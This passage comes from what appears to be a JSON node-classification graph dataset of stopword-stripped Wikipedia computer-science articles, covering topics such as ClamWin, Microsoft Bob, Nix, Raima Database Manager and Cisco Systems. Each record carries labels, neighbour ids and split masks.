      3014,
      5065,
      8143,
      10703,
      466,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      3050,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6822,
    "label": 1,
    "text": "The_Third_Manifesto:third manifesto third manifesto 1995 christopher j date hugh darwen proposal future database management systems response two earlier manifestos purpose theme manifestos avoid object-relational impedance mismatch object-oriented programming languages relational database management systems third manifesto proposes maintain relational model databases support objects user-defined types major theme manifesto explain inadequacies existing relational database management systems shortcomings relational database model per se rather implementation decisions systems sql query language systems use manifesto describes alternative sql named d. specification desirable characteristics database language rather specific syntax grammar describes family languages rather particular language however example particular member hypothetical family called tutorial described detail including significant portions grammar several partial implementations exist including",
    "neighbors": [
      8582,
      8808,
      5677,
      10413,
      8628,
      9397,
      1146,
      11327
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6823,
    "label": 4,
    "text": "ClamWin_Free_Antivirus:clamwin free antivirus clamwin free antivirus free open-source antivirus tool windows provides graphical user interface clam antivirus engine firefox extensions allow users process downloaded files clamwin clamwin free antivirus scans demand automatically scan files read written non-affiliated projects clam sentinel winpooch add-ons provide real-time scanning capability clamwin clamwin free antivirus virus database updated automatically detects connection internet small balloon tip appears taskbar icon indicating completion status update process retries establish connection server fails download updates first time historically clamwin free antivirus suffered poor detection rates scans slow less effective antivirus programs example 2009 clamwin free antivirus failed detect almost half trojan horses password stealers malware av-test zoo malware samples 1–21 june 2008 test performed virus.gr clamwin free antivirus version 0.93 detected 54.68 threats ranked 37th 49 products tested best scored 99 10 august-05 september 2009 test performed virus.gr clamwin free antivirus version 0.95.2 detected 52.48 threats ranked 43 55 products tested best scored 98.89 6 september 2011 cnet gave clamwin free antivirus rating excellent 4 5 stars",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      8614,
      2601,
      8615,
      2859,
      3243,
      6699,
      8493,
      7983,
      6834,
      4403,
      9523,
      10166,
      7739,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      4584,
      8554,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 6824,
    "label": 3,
    "text": "Battle_Cross_(1982_video_game):battle cross 1982 video game battle cross shoot 'em arcade game released omori electric 1982 player controls fighter spacecraft moving around screen shooting enemies",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6825,
    "label": 5,
    "text": "Media_Resource_Control_Protocol:media resource control protocol media resource control protocol mrcp communication protocol used speech servers provide various services speech recognition speech synthesis clients mrcp relies another protocol real time streaming protocol rtsp session initiation protocol sip establishing control session audio streams client server mrcp uses similar style clear-text signaling http many internet protocols message contains 3 sections first-line header body first line indicates type message well information response codes header contains number lines format nowiki header data /nowiki body whose length specified header contains details message like http mrcp uses request usually issued client response model responses may simply acknowledge receipt request give information regarding processing example mrcp client may request send audio data processing say speech recognition server could respond message containing suitable port number send data since mrcp support audio data specifically would handled protocol real-time transport protocol rtp mrcp protocol version 2 approved rfc version 2 uses sip managing sessions audio streams server clients whereas version 1 specify underlying protocol mrcp adopted wide range commercial speech servers microsoft speech server lumenvox speech engine neospeech speech engine/server nuance recognizer vocalizer sestek tts sestek call steering well commercial interactive voice response software blueworx voice response",
    "neighbors": [
      8386,
      9380,
      9381,
      3533,
      10557,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 6826,
    "label": 9,
    "text": "Itk:itk itk framework building mega-widgets using incr tcl object system mega-widgets high-level widgets like file browser tab notebook act like ordinary tk widgets constructed using tk widgets component parts without write c code effect mega-widget looks acts exactly like tk widget considerably easier implement",
    "neighbors": [
      9345,
      8262,
      9575,
      692,
      3193
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6827,
    "label": 2,
    "text": "Microsoft_Bob:microsoft bob microsoft bob microsoft software product released march 11 1995 discontinued early 1996 program intended provide user-friendly interface windows 3.1x windows 95 windows nt operating systems supplanting windows program manager microsoft bob presented screens showing house rooms user could go containing familiar objects corresponding computer applications—for instance desk pen paper checkbook items case clicking pen paper would open word processor cartoon dog named rover cartoon characters provided guidance using speech balloons rover others later returned windows xp search companions upon release microsoft bob criticized media gain wide acceptance users resulted discontinuation microsoft bob released march 1995 windows 95 released although widely publicized prior date codename utopia project leader bob karen fries microsoft researcher design based research professors clifford nass byron reeves stanford university melinda gates wife bill gates marketing manager product microsoft originally purchased domain name bob.com boston-area techie bob antia later traded bob kerstein windows2000.com domain name bob included various office suite programs finance application word processor user interface designed simplify navigational experience novice computer users similar early graphical shells like jane main interface portrayed inside house different rooms corresponding common real-world room styles kitchen family room room contains decorations furniture well icons represent applications bob offers user option fully customizing entire house user full control decorating room add remove reposition objects user also add remove rooms house change destinations door also feature bob offers multiple themes room designs decorations contemporary postmodern applications built bob represented matching decorations – example clicking clock opens calendar pen paper represent word processor user also add shortcuts applications computer shortcuts display icon inside various styles decorations boxes picture frames released right internet beginning become popular bob offered email client user could subscribe mci mail dial-up email account price 5.00 per month send 15 emails per month email limited 5000 characters additional email limit reached additional 45 cents toll-free phone number called set account bob features assistants cartoon characters intended help user navigate virtual house perform tasks main interface within built-in applications edition microsoft bob bundled gateway 2000 computer around 1995 gateway edition contained gateway branding login screen along additional rooms backgrounds seen retail version one additional room attic contained box gateway 2000 computer along additional rooms icons appeared default new rooms bob one microsoft visible product failures despite discontinued windows 95 released microsoft bob continued severely criticized reviews popular media 2017 melinda gates acknowledged software needed powerful computer people back bob received 7th place pc world magazine list 25 worst tech products time number one worst product decade cnet.com spot list 50 worst inventions published time magazine called bob overly cutesy operating system designed around clippy microsoft steve ballmer mentioned bob example situation decided succeeded let stop microsoft employee raymond chen wrote article encrypted copy bob included windows xp install cds take space slow downloading illegal copies tech journalist harry mccracken called story delightfully urban legend-y tale noted similarities april fools day joke claiming bob hidden windows vista rover software dog mascot reappeared windows xp file search function typeface comic sans created used microsoft bob microsoft",
    "neighbors": [
      259,
      4356,
      4995,
      6150,
      11524,
      6797,
      782,
      1935,
      4624,
      8976,
      10769,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      7333,
      11559,
      1832,
      6441,
      7215,
      7727,
      7983,
      3890,
      11060,
      8757,
      7359,
      4289,
      194,
      3527,
      5319,
      6476,
      10957,
      4816,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      10338,
      740,
      2919,
      9448,
      8681,
      9585,
      7796,
      6265,
      1916
    ],
    "mask": "None"
  },
  {
    "node_id": 6828,
    "label": 2,
    "text": "Nix_package_manager:nix package manager nix cross-platform package management system utilizes purely functional deployment model software installed unique directories generated cryptographic hashes dependencies software included within hash solving problem dependency hell novel approach package management promises generate reliable reproducible portable packages nix packages defined lazy functional programming language specifically designed package management dependencies tracked directly language special values called derivations installed nix lazily nix keeps track references automatically installed packages garbage collected package depends cost greater storage requirements upgrades nix guaranteed atomic efficiently rolled back also enables multiple users safely install software system without administrator privileges nix full support linux safely installed side-by-side existing package manager macos also officially supported nixos linux distribution using nix consistently every piece software system including linux kernel",
    "neighbors": [
      10760,
      7181,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      3131,
      3649,
      10817,
      3667,
      6227,
      9324,
      1138,
      2168,
      7293,
      6797,
      10900,
      10394,
      4775,
      5819,
      190,
      4302,
      2259,
      6361,
      8413,
      741,
      231,
      2281,
      7920,
      6393,
      2304,
      11525,
      2310,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      10012,
      6446,
      1842,
      823,
      2872,
      3918,
      4951,
      9564,
      2401,
      1379,
      9063,
      8554,
      10096,
      2417,
      8068,
      3462,
      8582,
      6536,
      2955,
      2448,
      6583,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 6829,
    "label": 2,
    "text": "Code_segment:code segment computing code segment also known text segment simply text portion object file corresponding section program virtual address space contains executable instructions term segment comes memory segment historical approach memory management succeeded paging program stored object file code segment part file loader places program memory may executed various memory regions allocated particular pages corresponding segments object files segments needed run time example code segment object file loaded corresponding code segment memory code segment memory typically read-only fixed size embedded systems usually placed read-only memory rom without need loading code segment read-only particular architecture allows self-modifying code fixed-position position independent code may shared memory several processes segmented paged memory systems memory region code segment may placed heap stack order prevent heap stack overflows overwriting",
    "neighbors": [
      1922,
      8966,
      6921,
      3603,
      11411,
      1820,
      3386,
      6078,
      576,
      2627,
      6087,
      4424,
      5065,
      8012,
      9932,
      5840,
      6868,
      10333,
      8167,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6830,
    "label": 9,
    "text": "Printer_Command_Language:printer command language printer command language commonly referred pcl page description language pdl developed hewlett-packard printer protocol become de facto industry standard originally developed early inkjet printers 1984 pcl released varying levels thermal matrix page printers hp-gl/2 pjl supported later versions pcl pcl occasionally incorrectly said abbreviation printer control language actually another term page description language pcl levels 1 5e/5c command-based languages using control sequences processed interpreted order received consumer level pcl data streams generated print driver pcl output also easily generated custom applications hp introduced pcl 6 around 1995 hp laserjet 4000 series printers consists pcl 6 enhanced architecture altered modular easily modified future hp printers prints complex graphics faster reduces network traffic higher quality early implementations hp market pcl 6 well thus causing confusion terminology pcl xl renamed pcl 6 enhanced many third-party products still use older term products may claim pcl 6 compliant may include pcl 5 backward compatibility pcl 6 enhanced primarily generated printer drivers windows cups due structure compression methodology custom applications rarely use directly pcl 6 enhanced stack-based object-oriented protocol similar postscript however restricted binary encoding opposed postscript sent either binary code plain text plain-text commands code examples shown pcl programming documentation meant compiled utility like hp jetasm sent printer pcl 6 enhanced designed match drawing model windows gdi way windows printer driver simply passes gdi commands little modification leading faster return-to-application times microsoft extended concept next-generation xps format printer implementations xps developed new idea comparable display postscript apple quartz contrast gdi printers compressed bitmap sent printer jetready printers clj 3500/3550/3600 use undocumented extensions otherwise mandate class 3.0 inputs pjl printer job language introduced hp laserjet iiisi pjl adds job level controls printer language switching job separation environment commands status readback device attendance file system commands",
    "neighbors": [
      10885,
      3974,
      5384,
      137,
      6797,
      4751,
      11665,
      8733,
      11694,
      8628,
      8763,
      11074,
      9795,
      3524,
      73,
      7626,
      3323,
      10960,
      465,
      9683,
      1877,
      4836,
      10352,
      3579
    ],
    "mask": "Test"
  },
  {
    "node_id": 6831,
    "label": 1,
    "text": "Raima_Database_Manager:raima database manager raima database manager rdm acid-compliant embedded database management system designed use embedded systems applications rdm designed utilize multi-core computers networking local wide area on-disk in-memory storage management rdm provides support multiple application programming interfaces apis low-level c api c++ sql native odbc jdbc ado.net labview rdm highly portable available windows linux unix several real-time embedded operating systems source-code license also available rdm support non-sql record cursor level database access sql database design manipulation capabilities non-sql features important resource-restricted embedded system environments high performance small footprint priority sql important providing widely-known standard database access method small enough footprint embedded systems environments raima inc. originally released rdm 1984 called db_vista one first microcomputer network model database management systems designed exclusively use c language applications companion product called db_query introduced 1986 first sql-like query report writing utility network model database db_vista derivative dbms designed provide high-performance transaction-processing client-server sql dbms called raima database server rds released 1993 first dbms provided odbc api native sql interface also first sql system incorporated use network model ddl features soon thereafter rds renamed velocis 2001 rdm server version 8.4 rdm server released 2012 uninterrupted development rdm also known rdm embedded continued recent feature additions including database mirroring use support highly available ha systems database replication multi-version concurrency read-only transactions multiple transactional file server access encryption sql designed specifically use embedded systems applications version 12.0 rdm released 2013 also 2013 rdm introduced first on-platform sql dbms available use national instruments labview graphical programming language named national instruments labview embedded tools network product year version 14.0 rdm released q3/16 rdm v. 14.0 contains all-new data storage engine optimized specifically working in-memory resident data sets new in-memory database imdb allows significant performance gains reduction processing requirements compared older in-memory on-disk implementations version 14.1 rdm released q1/18 new release focuses ease use portability speed raima new file format develop deploy anywhere performance increased 50-100 depending use case compared previous rdm releases raima extended improved sql support snapshots geospatial functionality version 14.1 consolidates source code lines features raima database manager rdm server one source code rdm 14.1 includes major features updated in-memory support snapshots r-tree support compression encryption sql sql pl platform independence—develop deploy anywhere rmd 14.1 includes portability options direct copy paste permit development deployment different target platforms regardless architecture byte order release includes streamlined interface cursor-based extended sql support stored procedures support sql pl also supports odbc c c++ ado.net c jdbc java supported development environments include microsoft visual studio apple xcode eclipse wind river workbench redesigned optimized database file format architecture maintains acid compliance data safeguards separate formats in-memory on-disk hybrid storage file formats hide hardware platform specifics e.g. byte ordering download packages include examples rdm speed performance benchmarks transactional file server tfs software component within rdm system maintains safe multi-user transactional updates set files responds page requests tfserver utility links tfs allow run separate utility allowing users run rdm distributed computing environment tfs may also linked directly application avoid rpc overhead calling separate server modes operation dynamic ddl encryption additional sql data types data providers drivers interoperability different “ tree ” support snapshots circular tables support database limitations data types supported non-sql core ddl features sql ddl features rdm transactional file server tfs specializes serving managing database files given medium tfs set functions called rdm runtime manage sharing database files among one runtime library instances normal multi-user configuration tfs functions wrapped server process called tfserver standard tcp/ip used make connection whether runtime library tfserver computer different computers however computer faster shared-memory protocol available default figure shows one rdm client runtime may connections multiple tfservers one tfserver may used multiple client runtimes applications using rdm runtime tfservers locations processes invisible processes may one computer may different computers provides opportunities true distributed processing tfserver considered “ database controller ” much way disk controller manages storage device tfs initialized root directory stored files managed tfs one computer multiple disk controllers recommended one tfserver assigned controller facilitates parallelism one computer especially multiple cpu cores also present complete application system may multiple tfservers running one computer multiple computers networked together tfserver able run parallel others allowing performance scale accordingly tfs functions used rdm runtime programmer visibility calls made functions made available runtime library three forms descriptive reasons call tfsr tfst tfss rdm database union feature provides unified view multiple identically structured databases since rdm allows highly distributed data storage processing feature provides mechanism unifying distributed data giving appearance single large database simple illustration consider widely distributed database organization headquarters seattle branch offices boston london mumbai office owns maintains employee records locally headquarters also performs reporting entire organization database location structure identical others although fully contained database location also considered partition larger global database case partitioning based geographical location mechanism querying distributed database simple programmer database opened partitions referenced together symbols “ ” individual partition names partitioning unified queries also used scaling performance consider database operation begins lookup record ’ primary key “ database ” composed four partitions stored multi-core computer different disks controlled different disk controllers requirement scheme divides primary key among four partitions scheme modulo primary key application quickly determines partition store record read record since multiple cpu cores run multiple processes applications tfss four partitions accessible parallel four controllers permit processing capacity four times larger single-core single-disk single-partition configuration rdm allows database content encrypted transported across network written database files rdm encryption supports rijndael/aes encryption algorithm 128- 192- 256-bit keys based application-specified encryption key database mirroring rdm reproduces exact byte-for-byte copy master database onto mirrored slave database database mirroring important database feature applications require high availability ha tfserver fail reason application ha monitor automatically switch mirrored tfserver rdm provides synchronous mirroring transaction committed master tfserver also securely committed mirror tfserver rdm also provides set ha support api functions called application ha monitor monitor operational status tfservers mirroring also used support maintaining multiple copies database updates made master readers directed one mirrored slaves order distribute many possible database readers across multiple computers situation necessary master wait slave confirm successful commit transaction mirroring process run asynchronously rdm database mirroring requires master mirrored databases maintained computer/operating system platforms due released q2/18 replication similar mirroring really intended ha support transferring likely portions one database master another database slave replication designed work databases necessarily maintained platform slave databases rdm-managed databases 3rd-party dbms rdm replication includes support multiple master single slave selective replication circular table data—important embedded computers devices edge data grid status condition monitoring occurs status data stored master circular table replicated central control system maintaining permanent history device statuses made available variety time series analyses rdm also provides database change notification api library allows slave access master replication logs without data stored managed database allows example master store device control information database replicated device notification api order efficiently control device operation rdm sql programming language sql pl based ansi/iso sql persistent stored modules psm specification iso/iec 90756-4:2011 +2012 provides high-level language stored procedures functions written compiled called within rdm sql system rdm sql designed specifically use embedded systems applications important features rdm sql include rdm provides application programming interfaces allow application development variety programming languages rdm ported wide variety computers operating systems packages available following platforms rdm 14.1 consists two packages rdm 14.1 core rdm 14.1 enterprise rdm based applications used today major industries including aerospace defense automotive business automation financial government industrial automation medical telecommunication sampling rdm users includes following",
    "neighbors": [
      10048,
      7650,
      7080,
      10921,
      5612,
      4781,
      10286,
      6395,
      7983,
      9263,
      10413,
      3219,
      5492,
      10389,
      823,
      3323,
      8188
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6832,
    "label": 8,
    "text": "Versus_IO:versus io versus online comparison tool mobile phones tablets cameras camcorders cities versus aims 1 destination help users make informed buying decisions world ’ first multi-language all-algorithm big data driven content provider generating fully automated natural text keen focus user interface comparison platform turns raw data natural language simplifies complexity using versus consumers able view results simple clear format without ‘ information overload ’ ultimately allowing users digest complex product data quickly efficiently versus plans add additional 640 categories include real estate motorcycles food credit cards banks plastic surgeons even people unlike similar sites comparisons include user reviews strictly based technical specifications screen resolution processing power site presents results pointing one prefer product service launched april 2012 german startup urge io currently available 18 languages claims 500k monthly visits 60 page-view growth rate monthly basis",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6833,
    "label": 7,
    "text": "Community_cloud:community cloud community cloud computing collaborative effort infrastructure shared several organizations specific community common concerns security compliance jurisdiction etc whether managed internally third-party hosted internally externally controlled used group organizations shared interest costs spread fewer users public cloud private cloud cost savings potential cloud computing realized",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 6834,
    "label": 4,
    "text": "Cisco_Systems:cisco systems cisco systems inc. american multinational technology conglomerate headquartered san jose california center silicon valley cisco develops manufactures sells networking hardware telecommunications equipment high-technology services products numerous acquired subsidiaries opendns webex jabber jasper cisco specializes specific tech markets internet things iot domain security energy management cisco stock added dow jones industrial average june 8 2009 also included p 500 index russell 1000 index nasdaq-100 index russell 1000 growth stock index cisco systems founded december 1984 leonard bosack sandy lerner two stanford university computer scientists pioneered concept local area network lan used connect geographically disparate computers multiprotocol router system time company went public 1990 cisco market capitalization 224 million end dot-com bubble year 2000 cisco 500 billion market capitalization cisco systems founded december 1984 sandy lerner director computer facilities stanford university graduate school business lerner partnered husband leonard bosack charge stanford university computer science department computers cisco initial product roots stanford university campus technology early 1980s students staff stanford including bosack used technology campus link school computer systems talk one another creating box functioned multiprotocol router called blue box blue box used software originally written stanford research engineer william yeager due underlying architecture ability scale well yeager well-designed invention became key cisco early success 1985 bosack stanford employee kirk lougheed began project formally network stanford campus adapted yeager software became foundation cisco ios despite yeager claims denied permission sell blue box commercially july 11 1986 bosack lougheed forced resign stanford university contemplated filing criminal complaints cisco founders theft software hardware designs intellectual properties 1987 stanford licensed router software two computer boards cisco addition bosack lerner lougheed greg satz programmer richard troiano handled sales completed early cisco team company first ceo bill graves held position 1987 1988 1988 john morgridge appointed ceo name cisco derived city name san francisco company engineers insisted using lower case cisco early years logo intended depict two towers golden gate bridge february 16 1990 cisco systems went public market capitalization 224 million listed nasdaq stock exchange august 28 1990 lerner fired upon hearing news husband bosack resigned protest couple walked away cisco 170 million 70 committed charity although cisco first company develop sell dedicated network nodes one first sell commercially successful routers supporting multiple network protocols classical cpu-based architecture early cisco devices coupled flexibility operating system ios allowed keeping evolving technology needs means frequent software upgrades popular models time cisco 2500 managed stay production almost decade virtually unchanged company quick capture emerging service provider environment entering sp market product lines cisco 7000 cisco 8500 1992 1994 cisco acquired several companies ethernet switching kalpana grand junction notably mario mazzola crescendo communications together formed catalyst business unit time company envisioned layer 3 routing layer 2 ethernet token ring switching complementary functions different intelligence architecture—the former slow complex latter fast simple philosophy dominated company product lines throughout 1990s 1995 john morgridge succeeded john chambers internet protocol ip became widely adopted mid-to-late 1990s cisco introduced products ranging modem access shelves as5200 core gsr routers making major player market late march 2000 height dot-com bubble cisco became valuable company world market capitalization 500 billion july 2014 market cap us 129 billion still one valuable companies perceived complexity programming routing functions silicon led formation several startups determined find new ways process ip mpls packets entirely hardware blur boundaries routing switching one juniper networks shipped first product 1999 2000 chipped away 30 cisco sp market share response cisco later developed homegrown asics fast processing cards gsr routers catalyst 6500 switches 2004 cisco also started migration new high-end hardware crs-1 software architecture ios-xr part rebranding campaign 2006 cisco systems adopted shortened name cisco created human network advertising campaign efforts meant make cisco household brand—a strategy designed support low-end linksys products future consumer products traditional business side cisco continued develop routing switching security portfolio quickly growing importance ethernet also influenced company product lines limits ios aging crescendo architecture also forced cisco look merchant silicon carrier ethernet segment resulted new asr9000 product family intended consolidate company carrier ethernet subscriber management business around ezchip-based hardware ios-xr throughout mid-2000s cisco also built significant presence india establishing globalization centre east bangalore 1 billion cisco also expanded new markets acquisition—one example 2009 purchase mobile specialist starent networks cisco continued challenged domestic alcatel-lucent juniper networks overseas competitors huawei due lower-than-expected profit 2011 cisco reduced annual expenses 1 billion company cut around 3,000 employees early-retirement program accepted buyout planned eliminate many 10,000 jobs around 14 percent 73,400 total employees curtailment 2011 analyst call cisco ceo john chambers called several competitors name including juniper hp july 24 2012 cisco received approval eu acquire nds tv software developer us 5 billion 2013 cisco sold linksys home-router unit belkin international inc. signaling shift sales businesses rather consumers july 23 2013 cisco systems announced definitive agreement acquire sourcefire 2.7 billion august 14 2013 cisco systems announced would cut 4,000 jobs workforce roughly 6 starting 2014 end 2013 cisco announced poor revenue due depressed sales emerging markets caused economic uncertainty fears national security agency planting backdoors products april 2014 cisco announced funding early-stage firms focus internet things investment fund allocated investments iot accelerators startups alchemist accelerator ayla networks evrythng later year company announced laying another 6,000 workers 8 global workforce part second restructuring november 4 2014 cisco announced investment stratoscale may 4 2015 cisco announced ceo chairman john chambers would step ceo july 26 2015 remain chairman chuck robbins senior vice president worldwide sales operations 17-year cisco veteran announced next ceo july 23 2015 cisco announced divesture television set-top-box cable modem business technicolor sa 600 million division originally formed cisco 6.9 billion purchase scientific atlanta deal came part cisco gradual exit consumer market part effort cisco new leadership focus cloud-based products enterprise segments cisco indicated would still collaborate technicolor video products november 19 2015 cisco alongside arm holdings dell intel microsoft princeton university founded openfog consortium promote interests development fog computing january 2016 cisco invested velocloud software-defined wan sd-wan start-up cloud offering configuring optimizing branch office networks cisco contributed velocloud 27 million series c round led march capital partners february 2017 cisco launched cloud-based secure internet gateway called cisco umbrella provide safe internet access users n't use corporate networks vpns connect remote data centers immediately reporting fourth quarter earnings 2017 cisco price-per-share value jumped 7 earnings per share ratio increased 60 61 cents per share due part cisco outperformance analyst expectations september 2017 chambers announced would step executive chairman role end term board december 2017 december 11 2017 robbins elected succeed chambers executive chairman retaining role ceo chambers given title chairman emeritus reuters reported cisco systems inc ’ csco.o product revenue russia grew 20 percent 2017 ahead cisco ’ technology product revenue growth so-called bric countries brazil china india may 1 2018 cisco systems agreed buy ai-driven business intelligence startup accompany 270 million june 2018 cisco systems ranked 444th forbes global 2000 list 221.3 billion market cap fiscal year 2017 cisco reported earnings us 0.1 billion annual revenue us 49.3 billion increase 2.8 previous fiscal cycle cisco shares traded 43 per share market capitalization valued us 213.2 billion september 2018 low net income fiscal year 2018 attributed one time tax charge allowed cisco bring back capital overseas cisco used money able bring back lower tax rate fund share buybacks acquisitions cisco acquired variety companies spin products talent company 1995–1996 company completed 11 acquisitions several acquisitions stratacom biggest deals industry occurred internet boom 1999 company acquired cerent corporation start-up company located petaluma california us 7 billion expensive acquisition made cisco date acquisition scientific atlanta larger 1999 cisco also acquired stake 1 billion kpmg consulting enable establishing internet firm metrius founded keyur patel fuse several acquired companies grown 1bn+ business units cisco including lan switching enterprise voice internet protocol voip platform webex home networking latter came result cisco acquiring linksys 2003 2010 supplemented new product line dubbed cisco valet cisco announced january 12 2005 would acquire airespace us 450 million reinforce wireless controller product lines cisco announced january 4 2007 would buy ironport deal valued us 830 million completed acquisition june 25 2007 ironport best known ironport antispam senderbase email reputation service email security appliances accordingly ironport integrated cisco security business unit ironport senderbase renamed sensorbase take account input database cisco devices provide sensorbase allows devices build risk profile ip addresses therefore allowing risk profiles dynamically created http sites smtp email sources cisco announced march 15 2012 would acquire nds group 5bn transaction completed july 30 2012 recent merger deals cisco bought starent networks mobile packet core company moto development group product design consulting firm helped develop cisco flip video camera also 2010 cisco became key stakeholder e-skills week march 2011 cisco completed acquisition privately held network configuration change management software company pari networks although many buy-ins crescendo networks 1993 tandberg 2010 resulted acquisition flagship technology cisco many others failed—partially completely instance 2010 cisco occupied meaningful share packet-optical market revenues still par us 7 billion price tag paid 1999 cerent acquired technologies flip pure digital saw product lines terminated january 2013 cisco systems acquired israeli software maker intucell around 475 million cash move expand mobile network management offerings month cisco systems acquired cognitive security company focused cyber threat protection cisco also acquired solvedirect cloud services march 2013 ubiquisys mobile software april 2013 cisco acquired cyber-security firm sourcefire october 2013 june 16 2014 cisco announced completed acquisition threatgrid company provided dynamic malware analysis threat intelligence technology june 17 2014 cisco announced intent acquire privately held tail-f systems leader multi-vendor network service orchestration solutions traditional virtualized networks april 2 2015 cisco announced plans buy embrane software-defined networking startup deal give cisco embrane software platform provides layer 3–7 network services things firewalls vpn termination server load balancers ssl offload may 7 2015 cisco announced plans buy tropo cloud api platform simplifies addition real-time communications collaboration capabilities within applications june 30 2015 cisco acquired privately held opendns company best known dns service adds level security monitoring domain name requests august 6 2015 cisco announced completed acquisition privately held maintenancenet us-based company best known cloud-based contract management platform serviceexchange month cisco acquired pawaa privately held company bangalore india provides secure on-premises cloud-based file-sharing software september 30 2015 cisco announced intent acquire privately held portcullis computer security uk-based company provides cybersecurity services enterprise clients government sectors october 26 2015 cisco announced intent acquire parstream privately held company based cologne germany provides analytics database allows companies analyze large amounts data store near real time anywhere network october 27 2015 cisco announced would acquire lancope company focuses detecting threat activity 452.5 million cash-and-equity deal june 28 2016 cisco announced intent acquire cloudlock privately held cloud security company founded 2011 three israeli military veterans 293 million deal expected close first quarter 2017 august 2016 cisco announced getting closer making deal acquire springpath startup whose technology used cisco hyperflex systems cisco already owns undisclosed stake hyper-converged provider january 2017 cisco announced would acquire appdynamics company monitors application performance 3.7 billion acquisition came one day appdynamics set ipo january 26 2017 cisco founded innovation alliance germany eleven companies bringing together 40 sites 2,000 staff provide small businesses germany expertise august 1 2017 cisco completed acquisition viptela inc. 610 million cash assumed equity awards viptela privately held software-defined wide area network sd-wan company based san jose ca october 23 2017 cisco systems announced would acquiring broadsoft 1.9 billion entrench cloud communication collaboration area 2017 cisco systems shares mainly held institutional investors vanguard group blackrock state street corporation others cisco products services focus upon three market segments—enterprise service provider midsize small business cisco provides products services across five major technology areas networking including ethernet optical wireless mobility security collaboration including voice video data data center internet things cisco grown increasingly popular asia-pacific region last three decades dominant vendor australian market leadership across market segments uses australian office one main headquarters asia-pacific region offering diverse product portfolio long-term stability integration sustainable competitive advantage cisco became major provider voice ip enterprises moving home user market acquisitions scientific atlanta linksys scientific atlanta provides voip equipment cable service providers time warner cablevision rogers communications upc others linksys partnered companies skype microsoft yahoo integrate consumer voip services wireless cordless phones cisco partners offer cloud-based services based cisco virtualized unified computing system ucs part cisco unified services delivery solution includes hosted versions cisco unified communications manager ucm cisco unified contact center cisco unified mobility cisco unified presence cisco unity connection unified messaging cisco webex meeting center part tactical operations initiative cisco maintains several network emergency response vehicles nerv s. vehicles maintained deployed cisco employees natural disasters public crises vehicles self-contained provide wired wireless services including voice radio interoperability voice ip network-based video surveillance secured high-definition video-conferencing leaders first responders crisis areas 3 mbit/s bandwidth via 1.8-meter satellite antenna nervs based cisco headquarters sites san jose california research triangle park north carolina allowing strategic deployment north america become fully operational within 15 minutes arrival high-capacity diesel fuel-tanks allow largest vehicles run 72 hours continuously nerv deployed incidents october 2007 california wildfires hurricanes gustav ike katrina 2010 san bruno gas pipeline explosion tornado outbreaks north carolina alabama 2011 hurricane sandy 2012 tactical operations team maintains deploys smaller portable communication kits emergencies outside north america 2010 team deployed assist earthquake recovery haiti christchurch new zealand 2011 deployed flooding brazil well response 2011 earthquake tsunami japan 2011 cisco received innovation preparedness award american red cross silicon valley chapter development use vehicles disasters cisco systems also sponsors line professional certifications cisco products four five path network designers levels certification entry ccent associate ccna/ccda professional ccnp/ccdp expert ccie/ccde recently architect ccar ccde previous well nine different paths routing switching design industrial network network security service provider service provider operations storage networking voice datacenter wireless number specialist technician sales datacenter certifications also available cisco also provides training certifications via portal called cisco networking academy qualifying schools become members cisco networking academy provide ccna level level courses cisco academy instructors must ccna certified ccai certified instructor cisco often finds involved technical education 10,000 partnerships 65 countries cisco academy program operates many exotic locations example march 2013 cisco announced interest myanmar investing two cisco networking academies yangon mandalay channel partner network cisco products including ip phones telepresence seen movies tv series company featured documentary film something ventured premiered 2011 cisco 2002–03 recipient ron brown award u.s. presidential honor recognize companies exemplary quality relationships employees communities cisco included part fortune 100 best companies work ranking 20 2011 according report technology consulting firm lexinnova cisco one leading recipients network security-related patents largest portfolio within companies 6,442 security-related patents 2015 class action lawsuit filed april 20 2001 accused cisco making misleading statements relied purchasers cisco stock insider trading cisco denied allegations suit august 18 2006 cisco liability insurers directors officers paid plaintiffs us 91.75 million settle suit december 11 2008 free software foundation filed suit cisco regarding cisco failure comply gpl lgpl license models make applicable source code publicly available may 20 2009 cisco settled lawsuit complying fsf licensing terms making monetary contribution fsf cisco criticized involvement censorship people republic china according author ethan gutmann cisco telecommunications equipment providers supplied chinese government surveillance internet infrastructure equipment used block internet websites track online activities china cisco stated customize develop specialized unique filtering capabilities enable governments block access information sells equipment china sells worldwide wired news uncovered leaked confidential cisco powerpoint presentation detailed commercial opportunities golden shield project internet control may 2011 group falun gong practitioners filed lawsuit alien tort statute alleging cisco knowingly developed customized product assist chinese government prosecution abuse falun gong practitioners lawsuit dismissed september 2014 united states district court northern district california decision appealed united states court appeals ninth circuit september 2015 october 2007 employees cisco brazilian unit arrested charges imported equipment without paying import duties response cisco stated import directly brazil instead use middlemen december 1 2008 multiven filed antitrust lawsuit cisco systems inc. multiven complaint alleges cisco harmed multiven consumers bundling tying bug fixes/patches updates operating system software maintenance services smartnet may 2010 cisco accused person filed antitrust suit 